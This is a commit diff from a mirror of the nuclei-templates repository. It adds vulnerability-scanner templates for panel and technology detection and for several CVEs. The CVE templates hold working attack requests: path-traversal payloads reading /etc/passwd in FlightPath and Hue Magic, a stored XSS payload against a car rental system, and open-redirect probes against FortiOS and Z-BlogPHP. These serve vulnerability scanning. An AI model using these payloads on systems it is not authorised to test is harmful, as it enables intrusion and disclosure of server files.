daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #2 from projectdiscovery/master 

Updation
patch-1
Dhiyaneshwaran 2022-02-01 11:33:14 +05:30 committed by GitHub
parent e0988ed383 b815a0706a
commit 0a715c0118
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
69 changed files with 697 additions and 257 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
.nuclei-ignore
View File

@ -10,7 +10,6 @@
tags:
- "fuzz"
- "dos"
- "misc"
# files is a list of files to ignore template execution
# unless asked for by the user.

27
cves/2016/CVE-2016-3978.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2016-3978
info:
name: FortiOS (Fortinet) - Open Redirect and XSS
author: 0x_Akoko
severity: medium
description: The Web User Interface (WebUI) in FortiOS 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting (XSS) attacks via the "redirect" parameter to "login."
reference:
- https://seclists.org/fulldisclosure/2016/Mar/68
- https://nvd.nist.gov/vuln/detail/CVE-2016-3978
tags: cve,cve2016,redirect,fortinet,fortios
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2016-3978
cwe-id: CWE-79
requests:
- method: GET
path:
- '{{BaseURL}}/login?redir=http://www.example.com'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

49
cves/2019/CVE-2019-13396.yaml Normal file
View File

@ -0,0 +1,49 @@
id: CVE-2019-13396
info:
name: FlightPath Local File Inclusion
author: 0x_Akoko,daffainfo
severity: high
description: FlightPath versions prior to 4.8.2 and 5.0-rc2 suffer from a local file inclusion vulnerability.
reference:
- https://www.exploit-db.com/exploits/47121
- https://www.cvedetails.com/cve/CVE-2019-13396/
- https://nvd.nist.gov/vuln/detail/CVE-2019-13396
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2019-13396
cwe-id: CWE-22
tags: cve,cve2019,flightpath,lfi
requests:
- raw:
- |
GET /login HTTP/1.1
Host: {{Hostname}}
- |
POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
callback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
extractors:
- type: regex
name: token
part: body
group: 1
internal: true
regex:
- "idden' name='form_token' value='([a-z0-9]+)'>"

38
cves/2020/CVE-2020-18268.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2020-18268
info:
name: Z-BlogPHP 1.5.2 Open redirect
author: 0x_Akoko
severity: medium
description: Open Redirect in Z-BlogPHP v1.5.2 and earlier allows remote attackers to obtain sensitive information via the "redirect" parameter in the component "zb_system/cmd.php."
reference:
- https://github.com/zblogcn/zblogphp/issues/216
- https://www.cvedetails.com/cve/CVE-2020-18268
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2020-18268
cwe-id: CWE-601
tags: cve,cve2020,redirect,zblogphp,authenticated
requests:
- raw:
- |
POST /zb_system/cmd.php?act=verify HTTP/1.1
Host: {{Hostname}}
Content-Length: 81
Content-Type: application/x-www-form-urlencoded
Connection: close
btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0
- |
GET /zb_system/cmd.php?atc=login&redirect=http://www.example.com HTTP/2
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

6
cves/2020/CVE-2020-35489.yaml
View File

@ -29,9 +29,9 @@ requests:
- "Contact Form 7"
part: body
- type: regex
regex:
- '^== Changelog =="'
- type: word
words:
- '== Changelog =='
part: body
- type: regex

34
cves/2021/CVE-2021-25864.yaml Normal file
View File

@ -0,0 +1,34 @@
id: CVE-2021-25864
info:
name: Hue Magic - Directory Traversal
author: 0x_Akoko
severity: high
description: node-red-contrib-huemagic 3.0.0 is affected by hue/assets/..%2F Directory Traversal.in the res.sendFile API, used in file hue-magic.js, to fetch an arbitrary file.
reference:
- https://github.com/Foddy/node-red-contrib-huemagic/issues/217
- https://www.cvedetails.com/cve/CVE-2021-25864
metadata:
shodan-query: title:"NODE-RED"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-25864
cwe-id: CWE-22
tags: cve,cve2021,huemagic,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

111
cves/2021/CVE-2021-46005.yaml Normal file
View File

@ -0,0 +1,111 @@
id: CVE-2021-46005
info:
name: Sourcecodester Car Rental Management System 1.0 - Stored XSS
author: cckuailong
severity: medium
description: Sourcecodester Car Rental Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via vehicalorcview parameter.
reference:
- https://www.exploit-db.com/exploits/49546
- https://nvd.nist.gov/vuln/detail/CVE-2021-46005
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2021-46005
cwe-id: CWE-79
tags: cve,cve2021,xss,sourcecodester,authenticated
requests:
- raw:
- |
POST /admin/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Connection: close
username={{username}}&password={{password}}&login=
- |
POST /admin/post-avehical.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypWqYipqU21aYgccv
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="vehicletitle"
Test
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="brandname"
1
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="vehicalorcview"
</script><script>alert(document.domain)</script>
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="priceperday"
500
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="fueltype"
Petrol
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="modelyear"
2022
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="seatingcapacity"
5
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="img1"; filename="test.png"
Content-Type: image/png
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="img2"; filename="test.png"
Content-Type: image/png
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="img3"; filename="test.png"
Content-Type: image/png
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="img4"; filename="test.png"
Content-Type: image/png
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="img5"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="submit"
------WebKitFormBoundarypWqYipqU21aYgccv--
- |
GET / HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

24
exposed-panels/flightpath-panel.yaml Normal file
View File

@ -0,0 +1,24 @@
id: flightpath-panel
info:
name: FlightPath Panel
author: princechaddha
severity: info
metadata:
shodan-query: http.title:"flightpath"
tags: panel,flightpath
requests:
- method: GET
path:
- "{{BaseURL}}/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Login | FlightPath</title>"
- type: status
status:
- 200

9
technologies/openam-detect.yaml → exposed-panels/openam-panel.yaml
View File

@ -1,10 +1,12 @@
id: openam-detect
id: openam-panel
info:
name: Detect OpenAM and OpenSSO
name: OpenAM and OpenSSO Login Panel
author: philippedelteil
severity: info
tags: tech,openam
metadata:
shodan-query: http.title:"OpenAM"
tags: panel,openam,opensso,login
requests:
- method: GET
@ -16,6 +18,7 @@ requests:
- "{{BaseURL}}/sso/XUI"
- "{{BaseURL}}/sso/UI"
- "{{BaseURL}}/sso/UI/#login"
- "{{BaseURL}}/opensso/UI/Login"
- "{{BaseURL}}/openam/UI/login"
- "{{BaseURL}}/openam/UI/#loginlogin"
- "{{BaseURL}}/openam/UI/Login"

7
technologies/opensis-detect.yaml → exposed-panels/opensis-panel.yaml
View File

@ -1,10 +1,12 @@
id: opensis-detect
info:
name: OpenSIS Detect
name: OpenSIS Login Panel
author: pikpikcu
severity: info
tags: tech,opensis
metadata:
shodan-query: http.title:"openSIS"
tags: panel,opensis,login
requests:
- method: GET
@ -12,6 +14,7 @@ requests:
- "{{BaseURL}}"
- "{{BaseURL}}/opensis/index.php"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word

8
technologies/openx-detect.yaml → exposed-panels/openx-panel.yaml
View File

@ -1,10 +1,12 @@
id: openx-detect
id: openx-panel
info:
name: OpenX detect
name: OpenX Login Panel
author: pikpikcu
severity: info
tags: tech,openx
metadata:
shodan-query: http.title:"OpenX"
tags: panel,openx,login
requests:
- method: GET

13
technologies/phpcollab-detect.yaml → exposed-panels/phpcollab-panel.yaml
View File

@ -1,22 +1,29 @@
id: phpcollab-detect
id: phpcollab-panel
info:
name: PhpCollab detect
name: PhpCollab Login Panel
author: pikpikcu
severity: info
tags: tech,phpcollab
metadata:
shodan-query: http.title:"PhpCollab"
tags: panel,phpcollab,login
requests:
- method: GET
path:
- "{{BaseURL}}/general/login.php"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>PhpCollab</title>'
- type: status
status:
- 200
extractors:
- type: regex
part: body

10
technologies/remkon-manager-detect.yaml → exposed-panels/remkon-manager-panel.yaml
View File

@ -1,10 +1,12 @@
id: remkon-manager-detect
id: remkon-manager-panel
info:
name: Remkon Device Manager Detect
author: pikpikcu
name: Remkon Device Manager Login Panel
author: pikpikcu,daffainfo
severity: info
tags: remkon,tech,panel
metadata:
shodan-query: http.title:"Remkon Device Manager"
tags: panel,remkon,login
requests:
- method: GET

13
technologies/sage-detect.yaml → exposed-panels/sage-panel.yaml
View File

@ -1,10 +1,12 @@
id: sage-detect
id: sage-panel
info:
name: Sage X3 Detect
author: pikpikcu
name: Sage X3 Login Panel
author: pikpikcu,daffainfo
severity: info
tags: tech,sage
metadata:
shodan-query: http.title:"Sage X3"
tags: panel,sage,login
requests:
- method: GET
@ -13,11 +15,12 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Sage X3</title>"
- "'/auth/sage-id/registerStart'"
condition: and
- type: status
status:

31
exposed-panels/seeddms-panel.yaml Normal file
View File

@ -0,0 +1,31 @@
id: seeddms-panel
info:
name: SeedDMS Login Panel
author: pussycat0x,daffainfo
severity: info
metadata:
shodan-query: http.title:"SeedDMS"
tags: panel,seeddms,login
requests:
- method: GET
path:
- "{{BaseURL}}/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php"
- "{{BaseURL}}/dms/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php"
redirects: true
max-redirects: 2
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'href="/out/out.ViewFolder.php">SeedDMS</a>'
- 'href="../out/out.ViewFolder.php?folderid=1">SeedDMS</a>'
condition: or
- type: status
status:
- 200

33
exposed-panels/threatq-login.yaml Normal file
View File

@ -0,0 +1,33 @@
id: threatq-login
info:
name: ThreatQ login panel
author: idealphase
severity: info
description: ThreatQ serves as an open and extensible threat intelligence platform that allows you to automate the intelligence lifecycle, quickly understand threats, make better decisions and accelerate detection and response
reference: https://www.threatq.com/threat-intelligence-platform/
tags: panel,threatq
requests:
- method: GET
path:
- '{{BaseURL}}/login'
matchers-condition: and
matchers:
- type: word
words:
- '<title ng-bind="PageTitle.getTitle()">ThreatQ</title>'
- '<script src="/assets/js/threatq.min.js'
condition: or
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '<script src="/assets/js/threatq.min.js\?(.*)'

26
exposed-panels/voipmonitor-panel.yaml Normal file
View File

@ -0,0 +1,26 @@
id: voipmonitor-panel
info:
name: VoipMonitor panel
author: Yanyun
severity: info
metadata:
shodan-query: http.title:"VoIPmonitor"
tags: panel,voipmonitor,login
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "appShareUrl = 'share.voipmonitor.org'"
- "VoIPmonitor"
condition: and

37
exposed-panels/wazuh-panel.yaml Normal file
View File

@ -0,0 +1,37 @@
id: wazuh-panel
info:
name: Wazuh Login Panel
author: cyllective,daffainfo
severity: info
description: Wazuh - The Open Source Security Platform
reference: https://github.com/wazuh/wazuh
metadata:
shodan-query: http.title:"Wazuh"
tags: panel,wazuh,login
requests:
- method: GET
path:
- "{{BaseURL}}/app/login"
matchers:
- type: word
part: body
words:
- '&quot;id&quot;:&quot;wazuh&quot;'
- '&quot;title&quot;:&quot;Wazuh&quot;'
- '&quot;icon&quot;:&quot;plugins/wazuh/img/icon_blue.png&quot;'
- '&quot;url&quot;:&quot;/app/wazuh&quot;'
condition: or
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '&quot;version&quot;:&quot;([0-9.]+)&quot;'

32
exposed-panels/webmodule-ee-panel.yaml Normal file
View File

@ -0,0 +1,32 @@
id: webmodule-ee-panel
info:
name: Webmodule Login Panel
author: pussycat0x,daffainfo
severity: info
metadata:
google-dork: intitle:"Webmodule" inurl:"/webmodule-ee/login.seam" "Version"
reference: https://www.exploit-db.com/ghdb/7001
tags: panel,webmodule-ee,login
requests:
- method: GET
path:
- "{{BaseURL}}/webmodule-ee/login.seam"
matchers-condition: and
matchers:
- type: word
words:
- "<title>Webmodule</title>"
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- 'Version: ([0-9.]+)'

30
exposed-panels/xxljob-panel.yaml Normal file
View File

@ -0,0 +1,30 @@
id: xxljob-panel
info:
name: XXLJOB Admin Login Panel
author: pdteam,daffainfo
severity: info
tags: panel,xxljob,login
requests:
- method: GET
path:
- "{{BaseURL}}/xxl-job-admin/toLogin"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<a><b>XXL</b>JOB</a>"
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '"admin_version":"(.*?)"'

20
technologies/yzmcms-detect.yaml → exposed-panels/yzmcms-panel.yaml
View File

@ -1,10 +1,12 @@
id: yzmcms-detect
id: yzmcms-panel
info:
name: YzmCMS Detect
author: pikpikcu
name: YzmCMS Login Panel
author: pikpikcu,daffainfo
severity: info
tags: yzmcms,tech
metadata:
shodan-query: http.title:"YzmCMS"
tags: panel,yzmcms,login
requests:
- method: GET
@ -13,11 +15,13 @@ requests:
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- 'Powered By <a href="http://www.yzmcms.com"'
- 'Powered By YzmCMS'
condition: or
- type: status
status:
- 200

32
exposed-panels/zblogphp-panel.yaml Normal file
View File

@ -0,0 +1,32 @@
id: zblogphp-panel
info:
name: Z-BlogPHP Panel
author: princechaddha
severity: info
metadata:
shodan-query: http.html:"Z-BlogPHP"
tags: panel,zblogphp
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<meta name="generator" content="Z-BlogPHP'
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '<meta name="generator" content="([:A-Z-a-z 0-9.]+)"'

4
miscellaneous/addeventlistener-detect.yaml
View File

@ -4,7 +4,7 @@ info:
name: AddEventlistener detection
author: yavolo
severity: info
tags: xss
tags: xss,misc
reference: https://portswigger.net/web-security/dom-based/controlling-the-web-message-source
requests:
@ -14,6 +14,6 @@ requests:
matchers:
- type: word
part: body
words:
- 'window.addEventListener('
part: body

6
miscellaneous/apple-app-site-association.yaml
View File

@ -4,7 +4,7 @@ info:
name: Apple app site association for harvesting end points
author: panch0r3d
severity: info
tags: misc
tags: misc,apple
requests:
- method: GET
@ -17,17 +17,17 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'applinks'
- 'appID'
- 'paths'
part: body
condition: and
- type: word
part: header
words:
- 'application/json'
part: header
- type: status
status:

2
miscellaneous/dir-listing.yaml
View File

@ -11,6 +11,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
words:
@ -18,3 +19,4 @@ requests:
- "Index of /"
- "[To Parent Directory]"
- "Directory: /"
condition: or

20
miscellaneous/display-via-header.yaml
View File

@ -1,20 +0,0 @@
id: display-via-header
info:
name: Display Via Header
author: geeknik
reference: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Via
severity: info
tags: misc,generic
requests:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
extractors:
- type: regex
part: header
regex:
- "Via:.*"

4
miscellaneous/joomla-htaccess.yaml
View File

@ -16,14 +16,14 @@ requests:
matchers:
- type: word
words:
- "# @package Joomla"
- "Joomla"
- "Open Source Matters. All rights reserved"
condition: and
- type: word
part: header
words:
- "text/plain"
part: header
- type: status
status:

2
miscellaneous/joomla-manifest-file.yaml
View File

@ -21,9 +21,9 @@ requests:
condition: and
- type: word
part: header
words:
- "application/xml"
part: header
- type: status
status:

2
miscellaneous/moodle-changelog.yaml
View File

@ -22,9 +22,9 @@ requests:
condition: and
- type: word
part: header
words:
- "text/plain"
part: header
- type: status
status:

2
miscellaneous/ntlm-directories.yaml
View File

@ -14,7 +14,7 @@ requests:
Host: {{Hostname}}
Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
threads: 50
threads: 10
payloads:
path:
- /

4
miscellaneous/old-copyright.yaml
View File

@ -16,9 +16,9 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- '2022'
part: body
negative: true
- type: regex
@ -28,10 +28,10 @@ requests:
- '© [1-9]\d*'
- '&copy; [1-9]\d*'
- '&#169; [1-9]\d*'
extractors:
- type: regex
part: body
name: copyright_year
regex:
- 'Copyright [1-9]\d*'
- '© [1-9]\d*'

4
miscellaneous/detect-options-method.yaml → miscellaneous/options-method.yaml
View File

@ -1,7 +1,7 @@
id: detect-options-method
id: options-method
info:
name: Detect enabled OPTIONS methods
name: Allowed Options Method
author: pdteam
severity: info
tags: misc,generic

3
miscellaneous/robots.txt.yaml → miscellaneous/robots-txt.yaml
View File

@ -9,6 +9,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}/robots.txt"
matchers-condition: and
redirects: true
matchers:
@ -17,9 +18,9 @@ requests:
- "Disallow:"
- type: word
part: header
words:
- text/plain
part: header
- type: dsl
dsl:

18
miscellaneous/security.txt.yaml → miscellaneous/security-txt.yaml
View File

@ -10,20 +10,28 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/.well-known/security.txt"
- "{{BaseURL}}/security.txt"
- "{{RootURL}}/.well-known/security.txt"
- "{{RootURL}}/security.txt"
stop-at-first-match: true
redirects: true
max-redirects: 3
max-redirects: 2
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Contact:"
condition: and
- type: dsl
dsl:
- "len(body) <= 1024 && len(body) > 0"
condition: and
extractors:
- type: regex
group: 1
regex:
- '(?mi)Contact:(.*)'

25
miscellaneous/tabnabbing-check.yaml
View File

@ -1,25 +0,0 @@
id: tabnabbing-check
info:
name: Reverse Tabnabbing
author: bolli95
severity: info
tags: misc
reference:
- https://owasp.org/www-community/attacks/Reverse_Tabnabbing
- https://www.youtube.com/watch?v=TMKZCHYmtD4
- https://hackerone.com/reports/211065
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'regex("<a[A-z0-9\/\"\&\=\%\#\.\:\_\@\\\$ ]*target\=\"_blank\"[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*>", replace_regex(replace_regex(body, "<a[A-z0-9\/\"\&\=\%\#\.\:\_\@\\\$ ]*target\=\"_blank\"[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*(rel=\"noopener noreferrer\"|rel=\"noreferrer noopener\"|rel=\"noreferrer\"|rel=\"noopener\")[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*>", ""), "<a[A-z0-9\/\"\&\=\%\#\.\:\_\@\\\$ ]*(rel=\"noopener noreferrer\"|rel=\"noreferrer noopener\"|rel=\"noreferrer\"|rel=\"noopener\")[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*target\=\"_blank\"[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*>", "")) || regex("window\.open\\([^,]+\\)", body)'
- type: dsl
dsl:
- "!contains(tolower(all_headers), 'referrer-policy: no-referrer')"

4
miscellaneous/trace-method.yaml
View File

@ -15,9 +15,9 @@ requests:
matchers:
- type: word
name: trace-request
part: body
words:
- "TRACE / HTTP"
part: body
- method: OPTIONS
path:
@ -26,6 +26,6 @@ requests:
matchers:
- type: regex
name: options-request
part: header
regex:
- "(?i)Allow: [A-Z,]*TRACE"
part: header

36
technologies/apollo-server-detect.yaml Normal file
View File

@ -0,0 +1,36 @@
id: apollo-server-detect
info:
name: Apollo Server GraphQL introspection detection
author: idealphase
severity: info
description: Apollo Server is a community-maintained open-source GraphQL server. It works with many Node.js HTTP server frameworks, or can run on its own with a built-in Express server. Apollo Server works with any GraphQL schema built with GraphQL.js--or define a schema's type definitions using schema definition language (SDL).
reference: https://github.com/apollographql/apollo-server
tags: apollo,tect,graphql
requests:
- method: POST
path:
- "{{BaseURL}}/graphql"
headers:
Content-Type: application/json
body: |
{"query":"query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"}
matchers-condition: and
matchers:
- type: word
part: header
words:
- "Content-Type: application/json"
- type: word
part: body
words:
- "GraphQL introspection is not allowed by Apollo Server"
- type: status
status:
- 400

0
technologies/sitecore-default-page.yaml → technologies/default-sitecore-page.yaml
View File

2
technologies/jsf-detection.yaml
View File

@ -13,7 +13,7 @@ requests:
- "{{BaseURL}}"
redirects: true
max-redirects: 2
max-redirects: 3
matchers-condition: or
matchers:
- type: dsl

5
technologies/pega-detect.yaml
View File

@ -14,12 +14,15 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"description" :"The Pega API'
- type: status
status:
- 200
- type: word
part: header
words:
- 'application/json'
part: header

2
technologies/php-proxy-detect.yaml
View File

@ -29,4 +29,4 @@ requests:
part: body
group: 1
regex:
- 'PHP\-Proxy<\/a> ([0-9.]+)<\/div>'
- '<meta name="version" content="([0-9.]+)">'

6
technologies/redmine-cli-detect.yaml
View File

@ -16,9 +16,9 @@ requests:
- type: word
part: body
words:
- default
- my_id
- root_url
- "default"
- "my_id"
- "root_url"
condition: and
- type: status

1
technologies/sceditor-detect.yaml
View File

@ -18,6 +18,7 @@ requests:
- "<title>Ticket BBCode editor - SCEditor</title>"
- 'title="SCEditor"'
condition: and
- type: status
status:
- 200

21
technologies/seeddms-detect.yaml
View File

@ -1,21 +0,0 @@
id: seeddms-detect
info:
name: Seeddms-
author: pussycat0x
severity: info
tags: tech
requests:
- method: GET
path:
- "{{BaseURL}}/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
words:
- "<title>SeedDMS: Sign in</title>"
- type: status
status:
- 200

11
technologies/shopware-detect.yaml
View File

@ -5,10 +5,10 @@ info:
author: cyllective
severity: info
description: Detects Shopware CMS
tags: tech,shopware,cms
reference:
- https://github.com/shopware/shopware
- https://github.com/shopware/platform
tags: tech,shopware,cms
requests:
- method: GET
@ -16,12 +16,17 @@ requests:
- "{{BaseURL}}/admin"
- "{{BaseURL}}/backend"
matchers-condition: and
matchers:
- type: word
part: body
condition: or
words:
- 'Realisiert mit Shopware'
- 'Realised with Shopware'
- 'Shopware Administration (c) shopware AG'
- '<title>Shopware 5 - Backend (c) shopware AG</title>'
- '<title>Shopware 5 - Backend (c) shopware AG</title>'
condition: or
- type: status
status:
- 200

26
technologies/strapi-cms-detect.yaml
View File

@ -1,22 +1,32 @@
id: strapi-cms-detect
info:
name: strapi CMS detect
author: cyllective
name: Strapi CMS detect
author: cyllective,daffainfo
severity: info
description: Detects strapi CMS
description: Open source Node.js Headless CMS to easily build customisable APIs
reference: https://github.com/strapi/strapi
tags: tech,strapi,cms
reference:
- https://github.com/strapi/strapi
requests:
- method: GET
path:
- "{{BaseURL}}/admin/auth/login"
- "{{BaseURL}}/admin/init"
matchers:
- type: word
part: body
condition: or
words:
- '<title>Strapi Admin</title>'
- '"data"'
- '"uuid"'
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '"strapiVersion":"([0-9.]+)"'

8
technologies/tech-detect.yaml
View File

@ -3117,6 +3117,12 @@ requests:
- type: word
name: thinkphp
part: header
words:
- "ThinkPHP"
part: header
- type: word
name: apollo
part: body
words:
- "initApollo)(i.ApolloTargetServer.Self)"

4
technologies/terraform-detect.yaml
View File

@ -17,8 +17,8 @@ requests:
- type: word
part: body
words:
- access_key
- terraform
- "access_key"
- "terraform"
condition: and
- type: status

12
technologies/thinkcmf-detection.yaml → technologies/thinkcmf-detect.yaml
View File

@ -1,10 +1,10 @@
id: thinkcmf-detection
info:
name: ThinkCMF Detection
author: pikpikcu
name: Detect ThinkCMF
author: pikpikcu,daffainfo
severity: info
tags: thinkcmf
tags: panel,thinkcmf,login
requests:
- method: GET
@ -13,12 +13,10 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- "X-Powered-By: ThinkCMF"
part: header
condition: and
- '<meta name="author" content="ThinkCMF">'
- type: status
status:

0
technologies/vmware-detect.yaml → technologies/vmware/vmware-detect.yaml
View File

0
technologies/vmware-horizon.yaml → technologies/vmware/vmware-horizon.yaml
View File

0
technologies/vmware-site-recovery-manager.yaml → technologies/vmware/vmware-site-recovery-manager.yaml
View File

0
technologies/vmware-vrealize-detect.yaml → technologies/vmware/vmware-vrealize-detect.yaml
View File

24
technologies/voipmonitor-detect.yaml
View File

@ -1,24 +0,0 @@
id: voipmonitor-detect
info:
name: VoipMonitor detect
author: Yanyun
severity: info
tags: tech,voipmonitor
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'share.voipmonitor.org'
- 'VoIPmonitor'
condition: and

25
technologies/wazuh-detect.yaml
View File

@ -1,25 +0,0 @@
id: wazuh-detect
info:
name: wazuh detect
author: cyllective
severity: info
description: Detects wazuh
tags: tech,wazuh
reference:
- https://github.com/wazuh/wazuh
requests:
- method: GET
path:
- "{{BaseURL}}/app/login"
matchers:
- type: word
part: body
condition: or
words:
- '&quot;id&quot;:&quot;wazuh&quot;'
- '&quot;title&quot;:&quot;Wazuh&quot;'
- '&quot;icon&quot;:&quot;plugins/wazuh/img/icon_blue.png&quot;'
- '&quot;url&quot;:&quot;/app/wazuh&quot;'

21
technologies/webmodule-ee.yaml
View File

@ -1,21 +0,0 @@
id: webmodule-ee-detection
info:
name: Webmodule Detection
author: pussycat0x
severity: info
reference: https://www.exploit-db.com/ghdb/7001
tags: webmodule-ee,tech
requests:
- method: GET
path:
- "{{BaseURL}}/webmodule-ee/login.seam"
matchers-condition: and
matchers:
- type: word
words:
- "<title>Webmodule</title>"
- type: status
status:
- 200

1
technologies/werkzeug-debugger-detect.yaml
View File

@ -10,6 +10,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}/console"
matchers:
- type: word
words:

9
technologies/wondercms-detect.yaml
View File

@ -11,14 +11,15 @@ requests:
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "Set-Cookie: wondercms_"
- type: word
part: body
words:
- "Powered by WonderCMS"
- "https://www.wondercms.com"
condition: and
- type: status
status:
- 200

3
technologies/wuzhicms-detect.yaml
View File

@ -13,11 +13,12 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Powered by wuzhicms"
- "五指CMS"
condition: or
- type: status
status:

23
technologies/xxljob-admin-detect.yaml
View File

@ -1,23 +0,0 @@
id: xxljob-admin-detect
info:
name: XXLJOB Admin Login
author: pdteam
severity: info
tags: tech,xxljob
requests:
- method: GET
